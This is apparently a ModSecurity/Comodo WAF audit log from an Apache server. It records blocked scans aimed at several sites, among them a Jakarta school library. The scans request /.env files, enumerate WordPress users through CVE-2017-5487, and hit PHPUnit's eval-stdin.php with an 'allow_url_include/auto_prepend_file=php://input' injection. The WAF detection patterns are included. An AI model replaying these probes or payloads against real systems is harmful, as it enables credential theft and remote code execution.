[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749699998225004 2469 (- - -) Stopwatch2: 1749699998225004 2469; combined=1110, p1=383, p2=697, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bb07c56-Z-- --ce76e33e-A-- [12/Jun/2025:11:15:08 +0700] aEpUTGDP2O-J0msTyvXOYgAAAIg 103.236.140.4 59322 103.236.140.4 8181 --ce76e33e-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 157.66.56.29 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 129 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 157.66.56.29 Cookie: X-Varnish: 174554047 --ce76e33e-C-- --ce76e33e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce76e33e-E-- --ce76e33e-H-- Message: Access denied with code 403 (phase 2). String match " --54715432-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54715432-E-- --54715432-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749703192604425 4658 (- - -) Stopwatch2: 1749703192604425 4658; combined=3376, p1=492, p2=2847, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54715432-Z-- --01ef1817-A-- [12/Jun/2025:11:49:17 +0700] aEpcTaF10OasdbQdujhVBQAAAME 103.236.140.4 51352 103.236.140.4 8181 --01ef1817-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept-Charset: utf-8 --01ef1817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ef1817-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749703757785829 739 (- - -) Stopwatch2: 1749703757785829 739; combined=301, p1=257, p2=0, p3=0, p4=0, p5=44, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01ef1817-Z-- --c67ebf6d-A-- [12/Jun/2025:13:43:25 +0700] aEp3DcCW7vAFWQIjJpzEwgAAAFM 103.236.140.4 52110 103.236.140.4 8181 --c67ebf6d-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 31.56.56.152 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 31.56.56.152 Accept-Encoding: gzip X-Varnish: 174554562 --c67ebf6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c67ebf6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749710605831571 613 (- - -) Stopwatch2: 1749710605831571 613; combined=247, p1=216, p2=0, p3=0, p4=0, p5=31, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c67ebf6d-Z-- --15798246-A-- [12/Jun/2025:13:46:15 +0700] aEp3t8CW7vAFWQIjJpzHMwAAAE0 103.236.140.4 58394 103.236.140.4 8181 --15798246-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.232.112.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.232.112.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --15798246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15798246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749710775515126 2485 (- - -) Stopwatch2: 1749710775515126 2485; combined=1035, p1=387, p2=628, p3=0, p4=0, p5=20, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15798246-Z-- --4a0fc678-A-- [12/Jun/2025:14:03:22 +0700] aEp7umDP2O-J0msTyvV6kAAAAIQ 103.236.140.4 39522 103.236.140.4 8181 --4a0fc678-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 209.97.180.8 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --4a0fc678-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a0fc678-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749711802174820 1055 (- - -) Stopwatch2: 1749711802174820 1055; combined=380, p1=345, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a0fc678-Z-- --94045d62-A-- [12/Jun/2025:14:13:51 +0700] aEp-L6F10OasdbQdujgeuQAAANg 103.236.140.4 34480 103.236.140.4 8181 --94045d62-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 165.227.173.41 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --94045d62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94045d62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749712431111428 587 (- - -) Stopwatch2: 1749712431111428 587; combined=214, p1=185, p2=0, p3=0, p4=0, p5=29, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94045d62-Z-- --41a54074-A-- [12/Jun/2025:14:22:01 +0700] aEqAGfiOwnjCOc5ARoWHEAAAABU 103.236.140.4 52518 103.236.140.4 8181 --41a54074-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept-Charset: utf-8 --41a54074-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41a54074-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749712921292370 758 (- - -) Stopwatch2: 1749712921292370 758; combined=296, p1=259, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41a54074-Z-- --a267ff31-A-- [12/Jun/2025:15:21:45 +0700] aEqOGcCW7vAFWQIjJpwviwAAAEw 103.236.140.4 49322 103.236.140.4 8181 --a267ff31-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.167.40.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.167.40.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a267ff31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a267ff31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749716505193789 2469 (- - -) Stopwatch2: 1749716505193789 2469; combined=1262, p1=406, p2=823, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a267ff31-Z-- --b3d9093a-A-- [12/Jun/2025:16:01:42 +0700] aEqXdsCW7vAFWQIjJpxYyQAAAEc 103.236.140.4 52090 103.236.140.4 8181 --b3d9093a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --b3d9093a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3d9093a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749718902978709 870 (- - -) Stopwatch2: 1749718902978709 870; combined=374, p1=332, p2=0, p3=0, p4=0, p5=42, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3d9093a-Z-- --1b651f51-A-- [12/Jun/2025:16:16:51 +0700] aEqbA8CW7vAFWQIjJpxpVwAAAEw 103.236.140.4 57090 103.236.140.4 8181 --1b651f51-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept-Charset: utf-8 --1b651f51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b651f51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749719811110268 795 (- - -) Stopwatch2: 1749719811110268 795; combined=308, p1=271, p2=0, p3=0, p4=0, p5=37, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b651f51-Z-- --99e89b57-A-- [12/Jun/2025:16:43:33 +0700] aEqhRaF10OasdbQdujjjGgAAAMk 103.236.140.4 37056 103.236.140.4 8181 --99e89b57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.138.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.138.181 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --99e89b57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99e89b57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749721413203483 752 (- - -) Stopwatch2: 1749721413203483 752; combined=292, p1=259, p2=0, p3=0, p4=0, p5=33, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99e89b57-Z-- --f3678533-A-- [12/Jun/2025:17:03:02 +0700] aEql1viOwnjCOc5ARoUNBgAAAA0 103.236.140.4 37268 103.236.140.4 8181 --f3678533-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 Accept-Charset: utf-8 --f3678533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3678533-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749722582823406 858 (- - -) Stopwatch2: 1749722582823406 858; combined=362, p1=319, p2=0, p3=0, p4=0, p5=43, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3678533-Z-- --4fa32f3b-A-- [12/Jun/2025:17:05:39 +0700] aEqmc_iOwnjCOc5ARoUNCgAAAAI 103.236.140.4 37300 103.236.140.4 8181 --4fa32f3b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --4fa32f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fa32f3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749722739301752 777 (- - -) Stopwatch2: 1749722739301752 777; combined=316, p1=269, p2=0, p3=0, p4=0, p5=47, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fa32f3b-Z-- --f67ae732-A-- [12/Jun/2025:17:09:39 +0700] aEqnY_iOwnjCOc5ARoUNDgAAAA8 103.236.140.4 37330 103.236.140.4 8181 --f67ae732-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.230.246.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.230.246.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f67ae732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f67ae732-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749722979687894 3303 (- - -) Stopwatch2: 1749722979687894 3303; combined=1392, p1=484, p2=878, p3=0, p4=0, p5=30, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f67ae732-Z-- --3426e35f-A-- [12/Jun/2025:17:18:25 +0700] aEqpccCW7vAFWQIjJpyU2wAAAEA 103.236.140.4 37418 103.236.140.4 8181 --3426e35f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.84.99.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.84.99.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3426e35f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3426e35f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749723505666312 3254 (- - -) Stopwatch2: 1749723505666312 3254; combined=1433, p1=475, p2=921, p3=0, p4=0, p5=37, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3426e35f-Z-- --c2a33556-A-- [12/Jun/2025:17:44:55 +0700] aEqvp8CW7vAFWQIjJpyfAwAAAEM 103.236.140.4 53578 103.236.140.4 8181 --c2a33556-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.108.89.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.108.89.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2a33556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2a33556-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749725095671540 3498 (- - -) Stopwatch2: 1749725095671540 3498; combined=1577, p1=559, p2=982, p3=0, p4=0, p5=36, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2a33556-Z-- --f2b2fc3c-A-- [12/Jun/2025:18:25:41 +0700] aEq5NWDP2O-J0msTyvVWrwAAAIg 103.236.140.4 59236 103.236.140.4 8181 --f2b2fc3c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5 Accept-Charset: utf-8 --f2b2fc3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2b2fc3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749727541671792 948 (- - -) Stopwatch2: 1749727541671792 948; combined=374, p1=331, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2b2fc3c-Z-- --7fc9536a-A-- [12/Jun/2025:18:25:43 +0700] aEq5N6F10OasdbQdujhA7QAAANI 103.236.140.4 59238 103.236.140.4 8181 --7fc9536a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --7fc9536a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fc9536a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749727543932023 868 (- - -) Stopwatch2: 1749727543932023 868; combined=376, p1=334, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
